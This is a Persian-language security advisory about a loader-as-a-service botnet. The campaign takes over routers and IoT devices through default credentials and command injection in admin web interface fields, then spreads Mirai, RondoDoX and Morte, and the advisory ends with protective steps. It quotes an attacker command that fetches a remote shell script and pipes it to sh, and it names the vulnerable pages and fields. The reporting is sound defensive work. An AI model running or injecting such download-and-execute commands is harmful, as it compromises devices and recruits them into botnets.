یک عملیات بات‌نت جدید با مدل «لودِر-به‌عنوان-خدمت» شناسایی شده که با سوءاستفاده از رابط‌های وب مدیریتیِ روترها و دستگاه‌های IoT به‌صورت خودکار آن‌ها را تسخیر کرده و payloadهایی مانند Mirai، RondoDoX و Morte را منتشر می‌کند. پژوهشگران لاگ‌ها و پنل‌های کنترل‌و‌فرمان این کمپین را افشا کرده‌اند و نشان می‌دهد حمله با ترکیب تلاش نفوذ با اعتبارنامه‌های پیش‌فرض و تزریق فرمان در فیلدهای وب‌GUI انجام می‌شود. زیرساخت توزیعِ مقاوم و پشتیبانی از چند پروتکل و معماری باعث شده تا این تهدید بسیار مقیاس‌پذیر و آمادهٔ سوءاستفاده باشد — لذا اقدام فوری برای به‌روزرسانی، تغییر رمزهای پیش‌فرض و محدود کردن دسترسی‌های مدیریتی ضروری است.

جزئیات حمله / آسیب‌پذیری‌ها و هدف‌ها

• روش اصلی: تزریق فرمان (Command Injection) در فیلدهای وب‌GUI مدیریتی روترها از طریق پارامترهای POST و تنظیمات مدیریتی مثل NTP، syslog، hostname و صفحات خاصی مانند wlwps.htm و wan_dyna.html. مهاجمین فرمان‌های شل را به ورودی‌ها ارسال می‌کنند تا دستگاه‌ها را وادار به دانلود و اجرای اسکریپت از راه دور کنند.

• بردار اولیه نفوذ: پروب‌های خودکار که تلاش می‌کنند با استفاده از اعتبارنامه‌های پیش‌فرض (مثلاً admin:admin) یا اکانت‌های ضعیف وارد شوند؛ پس از ورود اولیه، دستوراتی مانند wget -qO- http://IP/rondo.*.sh | sh اجرا می‌شوند.

• payloadها و زیرساخت توزیع: پس از نفوذ، دستگاه‌ها اسکریپت‌ها و باینری‌هایی مانند RondoDoX، نسخه‌های Mirai و Morte را از سرورهای توزیع‌شده دانلود و اجرا می‌کنند. گزارش‌ها آدرس‌های IP مرتبط با زیرساخت را نیز فهرست کرده‌اند.

• اهداف: عمدتاً روترهای SOHO و دستگاه‌های IoT با وب‌GUI آسیب‌پذیر؛ همچنین تحلیل‌ها نشان می‌دهد که از برخی CVEهای قدیمی به‌عنوان فالوآپ نیز استفاده شده است تا شانس موفقیت افزایش یابد.

توضیح فنی (چطور کار می‌کند)

• مهاجمین ورودی‌های متنی در صفحات مدیریتی وب را هدف می‌گیرند و با ارسال رشته‌های حاوی فرمان، باعث می‌شوند دستگاه فرمان را در سطح سیستم اجرا کند؛ این اتفاق وقتی رخ می‌دهد که ورودی‌ها به‌درستی پاک‌سازی یا محدود نشده باشند.

• برای افزایش قابلیت موفقیت و سازگاری با معماری‌های مختلف، زنجیرهٔ توزیع از چند مکانیزم استفاده می‌کند: ابتدا HTTP (wget/curl) و در صورت ناموفق بودن، پروتکل‌های جایگزین مثل TFTP یا FTP (دستورات tftp یا ftpget) به‌عنوان fallback به‌کار گرفته می‌شود تا باینری مناسب معماری دانلود شود. این شیوه تضمین می‌کند payload روی طیف وسیعی از دستگاه‌های embedded اجرا شود.

• پس از دانلود، ماژول‌های fingerprinting اطلاعات دستگاه (MAC، hostname، نسخه firmware، معماری CPU) را جمع‌آوری می‌کنند تا تصمیم گرفته شود دستگاه چه نقشی به‌عهده بگیرد — شرکت در حملات DDoS، استخراج ارز، یا نگهداری دسترسی برای فروش.

وضعیت فعلی تهدید

• کمپین حداقل چند ماه فعال بوده و محققان لاگ‌ها و پنل‌های کنترل‌و‌فرمان آن را مشاهده و افشا کرده‌اند؛ زیرساخت توزیع شامل چندین آدرس IP است که تحمل خطا و پایداری عملیات را افزایش می‌دهد.

• در گزارش‌ها اشاره شده که هنوز بهره‌برداریِ گستردهٔ جدید در سطح کاربران نهایی به‌صورت عمومی اعلام نشده، اما روش خودکار و زیرساخت آمادهٔ سوءاستفاده است — یعنی در صورتی که مهاجمان هدف‌گیری را افزایش دهند، سریع گسترش خواهد یافت.

چگونه از خود محافظت کنیم؟ (اقدامات فوری)

1. فوراً firmware روترها و دستگاه‌های IoT را آپدیت کنید — دستگاه‌هایی که دیگر آپدیت رسمی ندارند باید در اولویت تعویض یا از شبکه جدا شوند.

2. نام‌کاربری/رمزهای پیش‌فرض را تغییر دهید و برای مدیریت از پسوردهای قوی و منحصربه‌فرد استفاده کنید.

3. دسترسی مدیریت از اینترنت را ببندید — صفحات وب مدیریتی را فقط از شبکه مدیریت یا از طریق VPN امن در دسترس قرار دهید؛ مدیریت از WAN را غیرفعال کنید.

4. پروتکل‌های ناامن را مسدود کنید — اگر نیاز ندارید، FTP و TFTP را از سمت WAN مسدود کنید تا از دانلودهای fallback مخرب جلوگیری شود.

5. نصب و فعال‌سازی سیستم‌های مانیتورینگ و WAF/IDS — الگوهای command injection و دانلودهای مشکوک را شناسایی و هشدار دهید.

6. قرنطینه و پاک‌سازی: در صورت شناسایی دستگاه‌های آلوده (مثلاً ارتباط با IPهای گزارش‌شده یا اجرای اسکریپت‌های ناشناس)، دستگاه را از شبکه جدا، لاگ‌ها را بررسی و firmware معتبر نصب کنید.

چرا این تهدید مهم است؟

این کمپین نشان‌دهندهٔ تکامل روش‌های مجرمان سایبری است؛ ترکیب یک مدل تجاری (Loader-as-a-Service) با سوءاستفاده از وب‌GUIهای آسیب‌پذیر، حمله را خودکار، آسان و مقیاس‌پذیر کرده است. پشتیبانی از چند پروتکل توزیع و معماری‌های مختلف به مهاجمان امکان می‌دهد طیف گسترده‌ای از دستگاه‌های متصل به اینترنت را هدف قرار دهند — نتیجهٔ موفقیت این حمله می‌تواند تبدیل شبکه‌های خانگی و سازمانی به ناوگان بات‌نت برای DDoS، استخراج ارز یا فروش دسترسی باشد.